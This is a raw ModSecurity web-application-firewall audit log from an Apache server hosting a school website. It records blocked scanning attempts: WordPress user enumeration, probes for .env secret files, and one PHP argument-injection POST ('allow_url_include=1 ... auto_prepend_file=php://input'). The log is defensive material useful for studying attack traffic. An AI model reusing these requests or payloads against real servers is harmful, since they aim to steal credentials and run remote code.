Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd5be7a-Z-- --8e460d3a-A-- [23/May/2025:23:29:00 +0700] aDCiTG_WNRyhaqaKDLxzFAAAANU 103.236.140.4 48030 103.236.140.4 8181 --8e460d3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.144.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.144.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e460d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e460d3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748017740710834 2305 (- - -) Stopwatch2: 1748017740710834 2305; combined=1172, p1=386, p2=758, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e460d3a-Z-- --561c081d-A-- [23/May/2025:23:43:23 +0700] aDClq1YzwfxII7zMfyGBpwAAABI 103.236.140.4 50422 103.236.140.4 8181 --561c081d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.242.57.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.242.57.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --561c081d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --561c081d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748018603026008 2969 (- - -) Stopwatch2: 1748018603026008 2969; combined=1432, p1=490, p2=915, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --561c081d-Z-- --9aea287a-A-- [23/May/2025:23:47:11 +0700] aDCmj2_WNRyhaqaKDLyG0wAAAMY 103.236.140.4 58526 103.236.140.4 8181 --9aea287a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9aea287a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aea287a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748018831557358 793 (- - -) Stopwatch2: 1748018831557358 793; combined=295, p1=261, p2=0, p3=0, p4=0, p5=33, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aea287a-Z-- --d09ac765-A-- [24/May/2025:00:10:14 +0700] aDCr9m_WNRyhaqaKDLyeqgAAAMM 103.236.140.4 50926 103.236.140.4 8181 --d09ac765-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.76.189.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.76.189.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d09ac765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d09ac765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748020214116457 25073 (- - -) Stopwatch2: 1748020214116457 25073; combined=1819, p1=533, p2=1250, p3=0, p4=0, p5=34, sr=66, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d09ac765-Z-- --93b68879-A-- [24/May/2025:01:01:45 +0700] aDC4CR67_KloOut96EmjegAAAIY 103.236.140.4 43194 103.236.140.4 8181 --93b68879-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.130.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.130.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --93b68879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b68879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748023305000485 3376 (- - -) Stopwatch2: 1748023305000485 3376; combined=1566, p1=467, p2=1066, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b68879-Z-- --5308c137-A-- [24/May/2025:01:26:27 +0700] aDC907z70bfNdlplZZN30AAAAE4 103.236.140.4 41088 103.236.140.4 8181 --5308c137-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.236.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.236.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5308c137-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5308c137-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748024787317596 2245 (- - -) Stopwatch2: 1748024787317596 2245; combined=965, p1=333, p2=608, p3=0, p4=0, p5=24, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5308c137-Z-- --be41592e-A-- [24/May/2025:01:40:19 +0700] aDDBE2_WNRyhaqaKDLwJhAAAAME 103.236.140.4 42242 103.236.140.4 8181 --be41592e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.158.233.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.158.233.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --be41592e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be41592e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748025619283923 4311 (- - -) Stopwatch2: 1748025619283923 4311; combined=2196, p1=651, p2=1512, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be41592e-Z-- --471cf603-A-- [24/May/2025:01:41:46 +0700] aDDBarz70bfNdlplZZOLCgAAAE0 103.236.140.4 45318 103.236.140.4 8181 --471cf603-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --471cf603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471cf603-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706523548 924 (- - -) Stopwatch2: 1748025706523548 924; combined=351, p1=314, p2=0, p3=0, p4=0, p5=37, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471cf603-Z-- --e3f6db54-A-- [24/May/2025:01:41:46 +0700] aDDBam_WNRyhaqaKDLwKwwAAANI 103.236.140.4 45320 103.236.140.4 8181 --e3f6db54-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e3f6db54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f6db54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706524284 808 (- - -) Stopwatch2: 1748025706524284 808; combined=303, p1=269, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f6db54-Z-- --e9a7c049-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRyQAAAJU 103.236.140.4 45328 103.236.140.4 8181 --e9a7c049-B-- GET /config/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e9a7c049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9a7c049-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706529511 694 (- - -) Stopwatch2: 1748025706529511 694; combined=281, p1=244, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9a7c049-Z-- --e0bd9311-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRygAAAJE 103.236.140.4 45340 103.236.140.4 8181 --e0bd9311-B-- GET /.env.local HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e0bd9311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0bd9311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706729279 655 (- - -) Stopwatch2: 1748025706729279 655; combined=241, p1=208, p2=0, p3=0, p4=0, p5=33, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0bd9311-Z-- --8946db4d-A-- [24/May/2025:01:41:46 +0700] aDDBah67_KloOut96EnRzQAAAI0 103.236.140.4 45346 103.236.140.4 8181 --8946db4d-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --8946db4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8946db4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706738839 680 (- - -) Stopwatch2: 1748025706738839 680; combined=293, p1=251, p2=0, p3=0, p4=0, p5=42, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8946db4d-Z-- --21836b57-A-- [24/May/2025:01:57:01 +0700] aDDE_W_WNRyhaqaKDLwZDAAAAMI 103.236.140.4 49252 103.236.140.4 8181 --21836b57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.221.220.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.221.220.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --21836b57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21836b57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748026621598552 3453 (- - -) Stopwatch2: 1748026621598552 3453; combined=1894, p1=530, p2=1333, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21836b57-Z-- --c2b80c6c-A-- [24/May/2025:02:40:45 +0700] aDDPPR67_KloOut96EkWcgAAAJU 103.236.140.4 57446 103.236.140.4 8181 --c2b80c6c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 165.98.134.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.98.134.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2b80c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2b80c6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748029245557130 4088 (- - -) Stopwatch2: 1748029245557130 4088; combined=2096, p1=618, p2=1442, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2b80c6c-Z-- --b52c3341-A-- [24/May/2025:02:50:22 +0700] aDDRfrz70bfNdlplZZPRrQAAAEg 103.236.140.4 50302 103.236.140.4 8181 --b52c3341-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.93.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.93.71 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b52c3341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b52c3341-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748029822333399 664 (- - -) Stopwatch2: 1748029822333399 664; combined=237, p1=207, p2=0, p3=0, p4=0, p5=30, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b52c3341-Z-- --721be901-A-- [24/May/2025:02:58:48 +0700] aDDTeB67_KloOut96Ekp7gAAAIo 103.236.140.4 40058 103.236.140.4 8181 --721be901-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 114.43.135.35 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 114.43.135.35 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --721be901-C-- --721be901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --721be901-E-- --721be901-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748030328824491 5257 (- - -) Stopwatch2: 1748030328824491 5257; combined=3807, p1=532, p2=3238, p3=0, p4=0, p5=36, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --721be901-Z-- --aee9d31b-A-- [24/May/2025:03:06:05 +0700] aDDVLR67_KloOut96EkxWQAAAII 103.236.140.4 55658 103.236.140.4 8181 --aee9d31b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.182.87.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.182.87.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aee9d31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aee9d31b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748030765831771 2816 (- - -) Stopwatch2: 1748030765831771 2816; combined=1173, p1=395, p2=736, p3=0, p4=0, p5=42, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aee9d31b-Z-- --b9b8a507-A-- [24/May/2025:03:20:58 +0700] aDDYqh67_KloOut96Ek_lwAAAIE 103.236.140.4 59086 103.236.140.4 8181 --b9b8a507-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.121.183.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.121.183.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b9b8a507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b8a507-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 